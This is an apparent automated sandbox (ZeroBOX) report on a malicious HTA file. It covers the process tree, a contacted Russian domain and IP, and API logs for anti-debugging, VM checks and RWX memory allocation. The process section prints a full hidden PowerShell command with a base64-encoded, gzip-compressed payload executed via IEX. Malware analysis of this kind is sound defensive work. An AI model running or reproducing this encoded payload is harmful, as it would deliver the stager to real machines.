Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 31, 2023, 12:32 p.m.	Aug. 31, 2023, 12:35 p.m.

Size	7.6KB
Type	HTML document, ASCII text, with very long lines
MD5	`cf35de3a0d4386f729982c33a1cc298a`
SHA256	`6d5892d2a372836b3c4553592762fe5f9e6934cc76558e00cb3a90911478b5f9`
CRC32	`518EACB3`
ssdeep	`192:WyDMN28LoFwgSTwX76sVKtXZOdULqrNRXPeD6vS+Oshqz2u:PMN2fC3cuCqJOEqn03+OshLu`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\referent.hta
1200
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB5AEwAdwBiAGkANgB0ADEASwAxAHYASQBNAEMAawBUAGMAMQA1AHEAUgBTAEMASwBNAGkAQwBNAGkATABpAEcAZgAzAHYANQA4AEcATgBaAHUAOQBtADcAMQAzAHEAKwA2ADEAaQBuAEsAWQBtAGUANQArACsAcABuAHUAbgBrAFoASAA2AGEAMgBlAHgAcQA2AGQAeQBxAEcARABzAE4AcwBKAGkAaABNADMARABMAEMANwBXAHUAMQA2AGEAMwBuAEkAVABaAE0AUQBlADgAQwArADEAbQB2AEwATABMAEQAVABjAHEAawBjAHYASwA1AFEAKwBoAHIARgBvAGYAMQBxAE8AVQA2AE0AawBnAFQANwB1ADMAWQAxAHQAbQBKAHIAaQB6AFcAdQA5ADEAYgA4AHUAZwAyAGQAegBFAGMAdAByAEgAbwBwAE4AeQBJAG4AaQAxAEgAegA2AHEAcAAyAFYAVQAxAGwAUQBXAEkAdAAwAFcAdABnAHAAZQA0AGUAdgBXADUAUgB1AGcANgBkAEIAQQB3ADEAbgBzAGsAbwBZAHMASwB0ADUAUQBZAHYAWAA3ADcAUQBXAFIAeQBqAEkARAAyADkAdAAzAG0AVQBrAGsAbQBDAHQAZwB2AGYAUgBVAG0AagBpAFgAMwBEAHAAbQBzAFUAbwA5AHYASAB4AFEAYgBaAEsAZgBZADMAZAB2ADMAYQA1AHYAMQB3AFkAZgBuAG4AYgBRAFYAdAAyAFcAdAB3AGkAZwB5AGMAYwBrADAASwBiAGEAdgAwAG8ASwAxAEgAdgBwAHMAMgA2AG4ALwA5AFYAVwA4ACsAMwAzAFoAZQAyAHUAdwB1AHMALwB5AGsAVQBkAGUATABKAEUAWABiAHQAdQBQADcAOQBTAGIAMgB2AFYAawBhAE4ASQBvAEkATgBlAHEAeQBhADgAZABoAEUAaQA3AFQAOQB0AFEATgBpAEwAdQAyAFcAYQBGAFgASwB2AEQAeQBDAFgAdQA5AGUAZgBaAHMARgBWAG4AZwB4ACsAKwBkAEwATABXAGUAWgBCAHAAMQBHAEkANgBCAEcALwBMAEUAWQBiADIARgBQAFoAZgAyAG4AbAA5AGUAcwBLADkAdgBhAEwAUQBzAFMATgAwAHQAYQBvAHQAQgBpAHUASQB3ADAAbABHADgAZAAyADIAVQB0AEEAVQByAGMASAB5AGsAbwBTAFcASQAxAFIATQA0AHcAbQBCAFYAYgB3AEsASQBHAEsAVgBaAEgARwBBAFgATABDAEMAMwBEAHoAMwBVAHUAQQA0AHkAMwAyACsAQgAzAHUAYwAvADEAZgB2AFMAVQBGAEIAKwBJAGYAZABQAGgAUgByAHYAaABXAEQAWABPAEkAMgBiAHIAWABOAE0ALwBBAGsAZABjAGgAVQAzAEoAMwBYAGcAegBpAC8AbwAzAHcAVgBYAEUAMwA2AC8AQgBGAGkAegA5AHIAMwAyAFEAYQBnADYAeQBFAGMAcgBLADAAVwB2AEsAZgBEADcATABsAFoAcgBWADEAZgBQADEAUgBDAEIAUAA0ADEAeABtAEwAaQBWADMAQQBPAEcAdAB6AEEAWgBRAEYAaABwAEcAQgBmAGwAYwBSAHAAeABoAHAAbwB2AFAAOAA3AG4AWgBQAFkAaQBtAGIAUgArAHEANgBoAHoAawBUAHIATABuAEkANwBuAGgATwBNAEIAZQA1ADYARQByAHYATgBTAHUAMgByAFcAegB0AEYAVAB6AHIAOAB1AE0AdABkADMAVQBGAHkAdQAvAHoANABiAEcATABSADAAQQA4AFEAVQBnAGIAVgAxADcAVQB2AEEATgB6ADQANgBNADcAVAAwAFUAYwBWAEgAKwA3AEoATgBBAFoAeQBOACsAbgBrAEIATwBjAHkAWgBuAFgAcABKADYAUABPAHYAWQB1AHoAVwBUAGQAOQBrAHEAUgBNADQAMABvAFoAegBUAHcAQQBWAGgARQBUAHoAWgB6AEMAbgBNADIAegBVAHgAVQBCAEcAVwArAEQAdgA5AEEANQBoAGUAcgAyAEUATgBFAE8AWAAzAGUAZgBVAEsAaQA3AFcAeQAvAGMAeQBsAG0AbgBmAFMAcABJAFcATgBzADQAZwB6ACsAMABXAHAAaQBQAEwAUgAwADQATABJADQAUABFAFAAUwArAFIAVwBSAHAAVwB3AC8AbwBQAHUASABMAG0AcAA2ADUAdABKAGUAbABGADMAVQB2AHoAQQAwAHIAUABwAHUAawB3AGcASQB6AEoAYgBEAGgAZABvAE0ASABRAEkAMgBTADcAbABsACsAeQAwAHMASQBFADEAMABGAFUAbwBiAHUAcgBDADQAVAA2AGgANQB6AFEAbAB1ADkARAB5AG8ARwBtAFAAWgB3AEoAegBKAFIAYwA2AEcAawBaAE0ANwBIAFQAKwB2AGYANABhAEwAWgAxAGwASQByAGIAeQBFAGQAYgAyAEYAMQBWAEkAYwA2ADMAVgBsAEIAegB6AGgAbABWAGgAWgB1ADEAUQBrADcAOQBQADgAQwArADUATQBrAHAASwBVAHEAdQBMAGkAUwA5AEEAdwAwAEIAbwBQAHQAaAAyAHMASQBtAGIAcAB4AEMAWABhAHUAMwBmAGcAbQA4AC8AdwAzAGUAegB5AFgAbQBKADUAaAAwAGoATQA0AEgAMgBhAGcAUwA4AFoAawBxADAAagBKAGQAcgB2AGUAdgBkAG4AbQA5AFAATAB3AHgAVwBmAEUAVwBwADgAQQBaAEYANABkAGIAeQBrAHAAUQByADYAdABYAFIAYQB4AFIASgAvAHIAWgBUAGkAegBrAGoAZABxAEwAZQBYAGIAUABDAFQAdQBCAE4AZQBEAFoAdwAwAFAAcwBPAEYAYQBTAGgAbABwAEUAYQBaAEwATgBaAG8AOQBqAEEAUgA4AHUAUgBiAFgAUABkAEwATQA4AEUAegBPAEQAdwBnAGsATwBoADMAMwBIAEgAYwA4AHUAeABmADEAagArAE4AVABKAHQAdAAyAE8ARQA0AGwANwBCAGUAYQBTAHoAegBzAGgAWQBjAFEAOQBRAHcAcAAzAHUANQBEAHIAcgBkAHoAQgBXAGMAOQBKAFgAbAAzAGsAbgBjAFYATQA1AEQANAB2AGUASwA0AHIAVABCAEsAdQAzAEMAKwBJAGUANAByAGIAMABZAE0AUQB4AHAALwBFAFAAUgAwAE8AUQBhADcAZgBpAHcASQBxAGQANwBxAEkASABmAGIAUQBUAEwASgB6AEkAdQAwAGoAYQAzAFUAbwBSAHAATQBiAEgAZQAvAHcAawAwAEsAUgBKAG0AeQBrADYASQBFAGoATABUAG8AcQBOADEAUwBPAGQAdwBYADQAQgBIADcAcABoAEsARABoAEQAagB6ADYAdwBlADkATQBRADgATQBlAEoARAB1AGgAOQBCAGQAUgAwAHMANABPAGgAawBOAFIARwBCAFkANgBRAGQASgBpAG8AZQBRADIAbgB1AEsANwArAE8AZwBUADQALwBtAHgAMgBQAFYAQgBYAHUAawBDAEoAdwBlADkAawBMAFYAdQB6AHoAbgBZAE0AeQA2ADMAWgA0AHAAVQBDAEUAOABLAEQAegBaADIAMgBYAFQAVgBGAFIAUQBwAFAASgBBAGIAcwBSAGMAegB1AHUANABjAGQAZQBQAFEAMABUAHQAegBmADIALwBOADcARQBHAFEAVgAvAFoAMQA1ADUAQQA3AFoAdgBJADQATgBOAEkAbgBZAG0AeAB0AHUAMABVAFIAOQBIAFIAeABJAHgANABrAE8AMABvAG4AcwAyAEUAdgB0AGcAbwA2AGsAbAB5ADAAbwBKAFoAcABxAFgAYwBvAHoAVgBmAEQAQQBRAHQAagBOAGoAMwBnAHUAcQA0AFYARAB0AGoAMQBCAFkATQBaAGcAZAAyAEEAbABtAFgAdwB3AGIAcgBuAG4AagB4AEUAagBFAGQAVAA1AFcAZwBUAGwARwBRAFgAcwBlAGkASwB4AFgAagBVAGMAMABGADMAUAA1AFUASgBtAEcAZABZAFgANQA5ADQAYwB3ADIAUQBxAG8AeABHAEsAdQB5AHEAbwB4AHAANAA5AE0AaQBZADkAeQBOAEQANwBRAHgATgBlAHEAeQBPAHUANABUAGEAUAA2AHEAMgBNAHMAaQB5AFUATwBmADMAcwBiAG4AYQBPAHcAawB4AHAAaAA3AHAAegB2AGgAUgA3ADcAUABVAE0AYwA0AG4AZAAyAHYANwBhAFQAKwA0AGkAZQBjADMALwBXAFAAMwBKAGwAagBtAGEAKwBKAHoAWgAyAEIAcwB2AE0AegBlAGMAZgB5AEcAVgBsAHkAVgBwAFgAaQB6AFkAOAAvAEoAagBzAE4AUABPADcAYQBzAGQANQB4AEgASQB4AC8AUQBaAGsAYwBaADYAeAA1AEYAVAAvAEIASQBOAHQAVABEADQAagBTAC8AWABoAGgAZQBmADYAegA2AGkAZwBGADQAUwBOAFYAMwBSAGcAYQBMAHkAMQBQADgAZgBzAHgAegBJAG0ASgB6ADMARwBKAHkAVAA2AGEAMQB0AFMANgBzAFoAWQBVAHYAdQB0AEcAVABSADUARwBhAHIAOAB5AFkANwBZAEEAMgBUAEcAMgBxAGUAaAByAFAAcQB3AHAAdgBxAFAAZAAzAE4AagBuAGcAagBmAE4AZQB6AHUAMQBHAHQAagBuAG4ATgBKAC8AagBUAGMAMQBqAHcATgA3AE0AUABIAGcAeQB3ADEASwB5AGgAagA4AHAAKwBtAFEANABoAFQAVwBMAE0AUwBuAFoAVwBPAFgAWgBhAEQAbwBrAFYAWABaAHUAVABQAEwANwByAFcARwBXAGUAeQBKAEYAbwB6AHgARwA0AC8AeQBSAG0AZgBjAFoARABaADkAegBCAGoANgBjAGEAYQBEAFgAOABjAEYASAA5AGQANwBWADIATABrAHkATwBYAGoATQB3AGoAdgBNAGQAVwA4AHcAVgBsAGYANQBsAE4ARgBrAGgAaQBhADAAawBXAEUANgA4AG8AUQBqAG0AYwBYAE0AWgBqAGcAVgBWADMAbABTAEkAVQB3AHoARQBqAFMAdgBNADIATQBvAFYAVwBFAFAASwA4AGEAYwBtAEgATgAyAEwAUwBwAHMASABqAEwAZwB2ADYAaQB0AEYARQAvAHoASwBOAEcAZwB1ADUASAA0ADYAUwA1AGsAaABwAHcAZwB4AFkARgBpAGoAKwA2AGUASwBKAHEAWgBzAGEARgA2ADEARwBrAGgAMwBMAG0AOAAwAHAAdQBIAG4ANQBZAGIAYgBTADcAYgA5ACsAcAB5ADcAVQA2ADIARgBEAG0ATABrAEMAQwBNAHUAbQBqAGMARQBaAGoAcABMAEIAaABNAEIAdQBhAG4ASgA0AHYAeABOAHYAcgBnAGMAYgBxAGEAUQBTAHgANgAvAGcAYgBpACsAQQBnAHgATABjAEcAegBFAFEAbABOAFEAbAAwAG4AUAAwAEMATQBKAGMATwBkAEwATgBHAFEATAAvAHUAbwBzAEUAYwB4ADYANwBEAEoAaABvAFEAYwBzAFkAVwBKAEoAQwArAG0AdQA5AHcANQAzAGsAVwBaAE0AcgB1ADMAVgBwADYAWQAwAFoARABqAEMAeAA3AGQATQBOAEkAdQAvAFcAdwBUAHIAQwBZAHkAUABqAFUAegBPAFYAcwB4AEoAMAA4AGIAZgB0AG0AUgB2AE4AWABEAFEAMQBtADcAbABtAEUATQAzAGMAagB4AFcARgA3AHgALwA4AEwASwB3AGEAMgBmAFkAdQBmADYAQgBGAFUASgB5AGwAMAAxAGYAWABQAFQATABOAHUARQA4ADgASQB6AHoATAB4AFUAWABkADIANwAxADkAdgBGAEEAWgBRAFIAOQAyAFcAaABxADAAcgBoADMAbgBwAFgANABIADcAWABLAGMAbABXAG4ASwB3AHQASAB3AG8AZgBkAEQAdQBYAHUANABvAEwAWQArADcAYwBzADQAeABEAHQANQBSAG8ATgBEADUAdQBzAHoAMABVAEIAOABpAEgARgBoAFMAYQAxAEUAdQBGAEoAMwAwAC8AdABNAHMAdQA2AHoAZgB0AEQAdgBSADgAcAAwADcAcwBCAFcANAB5AEUANABiAEUAMwBZAGUAagBKAHYAYQAyAEUAVgBxAHIAawAwACsATABiAEwAbQBzAE8AcABHAHoAaAA1AGUARwA3AEwATAB4AHkANQBjADUAdQBOAGQANgBZADEAQgBDAHcAUwBwAGQAdAB6AEQAOABRAE8AQQA0AFgAdgA1ADMAOABXAGIAdAB6ADAAbQBoAHcANgBoAG8AbgBKAFcAMQB5AGkANwBzAEgAWQBvAGYAVgB2AHoASwBTAHYAUABNAGUANQB3AEYAVwAvAFIALwBwAFAANABuAGsALwArAGQAMQBKAEsAMgBxAG8AMQA3AEkANgAwAEMAOQBEAEYAVAB6AFYAcgA5AGEANgAwAG0ATAByAEYAMwA4ADQAbAA3AGgASQA4AFUAdABNAFAANgBWAGMAdwBsAHEAUgBXAG4AdAA1AHQAdwBBAFYAOAAwADEAUgBYAGQAdQBMAGEAYQBtAE0AagBPAHMARwBzAEwAKwA0ADcAZABnAG4AdABrAFEAdAB6AEIAWgAwADIAOAB5AHMAcgA3AEcAdgB2AHgAcABmAFkATgB5AHkAMwAzAEoAUAB3AE4AMAA1AEMATgBvAE4ATwArAEgAWQBZAEwAaQBGAEUARQByAFYAZQBwAHYAbABKADAARQBZAEQANQBmAHcARAA5AGwAcgBMAE4AQQBnADQAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=
  2148

Name	Response	Post-Analysis Lookup
gk-stst.ru	A 194.169.175.143	194.169.175.143

IP Address	Status	Action
164.124.101.2	Active	Moloch
194.169.175.143	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 31, 2023, 12:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2023, 12:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2023, 12:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2023, 12:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 31, 2023, 12:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2023, 12:32 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 31, 2023, 12:32 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f13f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f13f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f13f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f13f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f13f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f13f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f2178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2023, 12:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f1fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 31, 2023, 12:32 p.m.		1	1	0

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

gk-stst.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 149 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02412000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02941000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02463000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
